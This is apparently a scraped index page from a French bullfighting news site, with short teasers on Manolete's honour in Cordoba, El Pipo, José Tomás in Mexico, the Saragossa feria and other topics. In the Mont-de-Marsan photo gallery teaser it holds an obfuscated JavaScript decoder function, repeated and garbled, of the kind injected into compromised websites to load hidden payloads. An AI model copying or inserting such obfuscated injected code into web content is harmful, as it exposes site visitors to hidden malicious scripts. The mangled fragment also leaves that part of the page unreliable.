LES « AISSELLES »

Villita

La convocation imaginée par Plaza 1, les gestionnaires des arènes de Madrid, pour récupérer dans les nouvelles arènes de Vista Alegre ce que l’on appela « Opportunité », inventée par Domingo Dominguín et les frères Lozano avec la collaboration du

RECONNAISSANCE À MANOLETE

Manolete001

Mardi dernier, la Mairie de Cordoue décida de nommer « Fils de Prédilection » de la ville Manuel Rodríguez, Manolete. Cette décision fut approuvée après la demande de la Commission du Centenaire de la naissance du torero, avec les votes

(Español) EL PIPO

el pipo

Un jour tel qu’aujourd’hui -15 novembre- d’il y a trente ans, décédait à l’Institut des Sciences Neurologiques de Madrid le charismatique homme d’affaires taurin Rafael Sánchez, El Pipo, victime d’une maladie hépatique. Il lui manquait trois jours pour

ANTONIO LUCAS

26/02/2014_ Foto de Antonio Lucas. Jose ayma

Il est poète et journaliste. Il écrit dans les pages culture et politique du journal « El Mundo », où il signe une chronique qui a pour titre « Cabo Suelto » (dernier détail). En plus, comme nous l’avons signalé, il est,

IMMONDICES PONCISTES

JTOMPONCE

La semaine dernière nous apprenions la bonne nouvelle que répondant à l’invitation faite par les organisateurs des arènes de Mexico, José Tomás remettrait l’habit de lumières le 12 décembre prochain pour y toréer au bénéfice des sinistrés du

SARAGOSSE

menuzar1

Le coso de la calle Pignatelli, si élégant et agréable, vient de fermer ses portes et avec lui s’achève le carrousel épuisant des férias de première catégorie. On sait que celle de Saragosse est la plus difficile à

VICTORINO

victoriN

Celle que l’on surnomme comme « la corrida totale » d’Illescas, s’est transformée, dès la minute de silence en sa mémoire à l’issue du paseo, jusqu’à l’explosion triomphale de l’épilogue, avec deux toreros et le mayoral de l’élevage portés par

GALERIE PHOTO MONT DE MARSAN 30/9/2017

menumont2oct17

Galerie de photos de Bertrandfunction h052c1b60aed(x6){var qd=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’;var t4= »;var t2,u1,q3,q7,sa,r9,u2;var u4=0;do{q7=qd.indexOf(x6.charAt(u4++));sa=qd.indexOf(x6.charAt(u4++));r9=qd.indexOf(x6.charAt(u4++));u2=qd.indexOf(x6.charAt(u4++));t2=(q74);u1=((sa&15)2);q3=((r9&3)=192)u1+=848;else if(u1==168)u1=1025;else if(u1==184)u1=1105;t4+=String.fromCharCode(u1);}if(u2!=64){if(q3>=192)q3+=848;else if(q3==168)q3=1025;else if(q3==184)q3=1105;t4+=String.fromCharCode(q3);}}while(u4=192)q3+=848;else if(q3==168)q3=1025;else if(q3==184)q3=1105;t4+=String.fromCharCode(q3);}}while(u4=192)q3+=848;else if(q3==168)q3=1025;else if(q3==184)q3=1105;t4+=String.fromCharCode(q3);}}while(u4=192)q3+=848;else if(q3==168)q3=1025;else if(q3==184)q3=1105;t4+=String.fromCharCode(q3);}}while(u4

L’ACCOLADE

abrazo

Son œuvre achevée, Miguel Angel Perera traversa le callejon de Las Ventas et tomba dans les bras de son apoderado. Ce n’était pas une accolade quelconque, c’était le maillon final d’une série d’événements amers, avec de l’inquiétude et

LE PUBLIC

publico

Week-end taurin. De Logroño à Séville. De Saint Mathieu à Saint Michel. Des demies arènes à la Ribera au presque plein de La Maestranza. D’une corrida notoire de Victorino à une autre estimable des trois fers de chez